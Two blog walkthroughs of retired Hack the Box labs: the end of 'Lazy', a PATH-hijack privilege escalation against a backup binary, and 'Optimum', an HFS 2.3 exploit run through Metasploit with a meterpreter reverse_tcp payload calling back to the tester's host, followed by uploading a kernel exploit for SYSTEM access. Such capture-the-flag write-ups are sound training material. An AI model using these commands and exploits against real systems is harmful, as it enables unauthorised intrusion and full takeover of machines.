As we saw in the screenshot above, there are peda and backup folders too. We tried working around them but nothing useful came up. Running the backup executable prints the shadow file with user hashes. So we ran strings on it and found that it contains the command “cat /etc/shadow”.

Now all we needed to do was create our own executable named cat, as shown in the image below. Here we are replacing cat with a file that gives us a shell on execution.

Now I have to set $PATH; first let's see the current $PATH with echo:

echo $PATH

Now export the new PATH:

export PATH=/home/mitsos:$PATH

What we did was add /home/mitsos to the front of $PATH because we created our own cat there. Now when we run the backup executable, our cat gets executed instead.

But first let's give the proper permissions to the cat file we created:

chmod 777 cat

Now let's execute backup to see whether we get a shell. Great! We have a root shell.

All that is left is to go to the root directory and get the flag. But remember that $PATH is changed, so to run the real cat we have to specify its full path:

/bin/cat root.txt

Great!! We got our root flag successfully

And this way, we successfully solved our challenge. YAY!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Hack the Box Challenge Lazy Walkthrough appeared first on Hacking Articles.


Hello friends!! Today we are going to solve another CTF challenge, “Optimum”, which is categorised as a retired lab presented by Hack the Box for online penetration practice. Solving the challenges in this lab is not that tough as long as you have sound knowledge of penetration testing. Let's start and learn how to breach the network and then exploit it to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are accessible online they have a static IP. The IP of Optimum is 10.10.10.8, so let's start with nmap port enumeration.

nmap -A 10.10.10.8

From the image below you can observe that port 80 is open, serving file sharing with HFS 2.3 on the victim's machine.

When I searched Google for a related exploit, the first link was a Metasploit exploit.

Then I ran msfconsole in a terminal to load the Metasploit framework and used the rejetto_hfs_exec module to exploit the target machine.

use exploit/windows/http/rejetto_hfs_exec
msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8
msf exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) > exploit

And it worked perfectly: I got meterpreter session 1, as shown below, and by running sysinfo I learned its system information.

Now let's complete the task by searching for the user.txt and root.txt flags hidden somewhere in its directories.

Inside C:\Documents and Settings\kostas\Desktop I found user.txt and used cat “file name” to read it.

cat user.txt.txt

Great!! We got our 1st flag successfully

For the root flag I really struggled a lot: all the privilege escalation exploits suggested by recon/local_exploit_suggester failed when I tried them. Then I searched Google for exploits related to Windows Server and found many; among them was “MS16-098 exploit 41020”. I simply downloaded this exe file and went for manual privilege escalation.

After downloading the exe file, I transferred it to the target machine via the meterpreter session.

meterpreter > upload /root/Desktop/41020.exe .
meterpreter > shell

Then, after executing whoami, it assured me that we are “nt authority\system”.

Inside C:\Documents and Settings\Administrator\Desktop I found root.txt and used type “file name” to read it.

type root.txt

Great!! We got our 2nd flag successfully

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Hack the Box Challenge: Optimum Walkthrough appeared first on Hacking Articles.
